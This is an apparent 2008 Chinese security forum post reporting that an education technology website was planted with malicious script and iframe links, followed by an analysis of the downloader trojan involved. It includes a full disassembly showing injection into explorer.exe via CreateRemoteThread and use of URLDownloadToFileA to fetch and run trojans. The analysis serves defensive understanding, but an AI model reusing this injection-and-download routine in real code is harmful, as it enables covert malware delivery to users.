标题:
中国教育技术被挂网马
[打印本页]
作者:
点饭的百度空间
时间:
2008-4-18 00:54
标题:
中国教育技术被挂网马
2008年04月15日 星期二 21:31
中国教育技术([url]www.
**已屏蔽**
)[/url]被插入恶意代码:
Log is generated by FreShow.
[wide]htp://www.
**已屏蔽**
[script]htp://.
**已屏蔽**
[frame]htp://.
**已屏蔽**
[script]htp://.
**已屏蔽**
[frame]htp://.
**已屏蔽**
[object]htp://.
**已屏蔽**
[frame]htp://.
**已屏蔽**
[frame]htp://.
**已屏蔽**
[frame]htp://.
**已屏蔽**
[frame]htp://.
**已屏蔽**
[frame]htp://.
**已屏蔽**
来自独客持情剑那里的下载者:
http://hi.baidu.com/fuxudong/blo ... 671bff513d92da.html
查找名字为的Shell_TrayWnd窗口类,获取到explorer.exe进程的PID,打开进程后申请内存空间,写入代码“88888888888888888***************************************^&*&%*%&*%*&&%*%^*%^*”,载入动态库Urlmon.dll,将获取到的函数URLDownloadToFileA地址压栈,创建远程线程激活写入的代码,下载两个木马ss[1].exe与614[1].exe,并将614[1].exe保存为c盘下temp.exe执行退出进程。
00401183 6A 00 push 0
00401185 68 00104000 push s.00401000 ; ASCII "Shell_TrayWnd"
0040118A E8 F5000000 call s.00401284 ; jmp to USER32.FindWindowA
0040118F 68 0E104000 push s.0040100E
00401194 50 push eax
00401195 E8 F0000000 call s.0040128A ; jmp to USER32.GetWindowThreadProcessId
0040119A FF35 0E104000 push dword ptr ds:[40100E]
004011A0 6A 00 push 0
004011A2 68 FF0F1F00 push 1F0FFF
004011A7 E8 02010000 call s.004012AE ; jmp to kernel32.OpenProcess
004011AC A3 12104000 mov dword ptr ds:[401012],eax
004011B1 6A 40 push 40
004011B3 68 00100000 push 1000
004011B8 68 5C010000 push 15C
004011BD 6A 00 push 0
004011BF FF35 12104000 push dword ptr ds:[401012]
004011C5 E8 EA000000 call s.004012B4 ; jmp to kernel32.VirtualAllocEx
004011CA A3 1A104000 mov dword ptr ds:[40101A],eax
004011CF 6A 00 push 0
004011D1 68 5C010000 push 15C
004011D6 68 2C104000 push s.0040102C ; ASCII "88888888888888888***************************************^&*&%*%&*%*&&%*%^*%^*"
004011DB FF35 1A104000 push dword ptr ds:[40101A]
004011E1 FF35 12104000 push dword ptr ds:[401012]
004011E7 E8 E0000000 call s.004012CC ; jmp to kernel32.WriteProcessMemory
004011EC 8B35 1A104000 mov esi,dword ptr ds:[40101A]
004011F2 81C6 2D010000 add esi,12D
004011F8 56 push esi
004011F9 68 4F204000 push s.0040204F ; ASCII "Urlmon.dll"
004011FE E8 A5000000 call s.004012A8 ; jmp to kernel32.LoadLibraryA
00401203 68 3C204000 push s.0040203C ; ASCII "URLDownloadToFileA"
00401208 50 push eax
00401209 E8 94000000 call s.004012A2 ; jmp to kernel32.GetProcAddress
0040120E 5E pop esi
0040120F 6A 00 push 0
00401211 6A 00 push 0
00401213 50 push eax
00401214 56 push esi
00401215 6A 00 push 0
00401217 6A 00 push 0
00401219 FF35 12104000 push dword ptr ds:[401012]
0040121F E8 72000000 call s.00401296 ; jmp to kernel32.CreateRemoteThread
00401224 A3 16104000 mov dword ptr ds:[401016],eax
00401229 833D 16104000 00 cmp dword ptr ds:[401016],0
00401230 74 18 je short s.0040124A
00401232 6A FF push -1
00401234 FF35 16104000 push dword ptr ds:[401016]
0040123A E8 81000000 call s.004012C0 ; jmp to kernel32.WaitForSingleObject
0040123F FF35 16104000 push dword ptr ds:[401016]
00401245 E8 46000000 call s.00401290 ; jmp to kernel32.CloseHandle
0040124A 68 00800000 push 8000
0040124F 68 5C010000 push 15C
00401254 FF35 1A104000 push dword ptr ds:[40101A]
0040125A FF35 12104000 push dword ptr ds:[401012]
00401260 E8 55000000 call s.004012BA ; jmp to kernel32.VirtualFreeEx
00401265 FF35 12104000 push dword ptr ds:[401012]
0040126B E8 20000000 call s.00401290 ; jmp to kernel32.CloseHandle
00401270 6A 05 push 5
00401272 68 1E104000 push s.0040101E ; ASCII "c:\temp.exe"
00401277 E8 4A000000 call s.004012C6 ; jmp to kernel32.WinExec
0040127C 6A 00 push 0
0040127E E8 19000000 call s.0040129C ; jmp to kernel32.ExitProcess
BY:unknown tycoon
[
Last edited by Legend on 2008-4-18 at 01:14
]
作者:
sq30
时间:
2008-4-18 10:31
悲哀! 实在让我感到悲哀!说句难听话,你们都干什么吃的, 悲哀!
欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/)
bbs.micropoint.com.cn
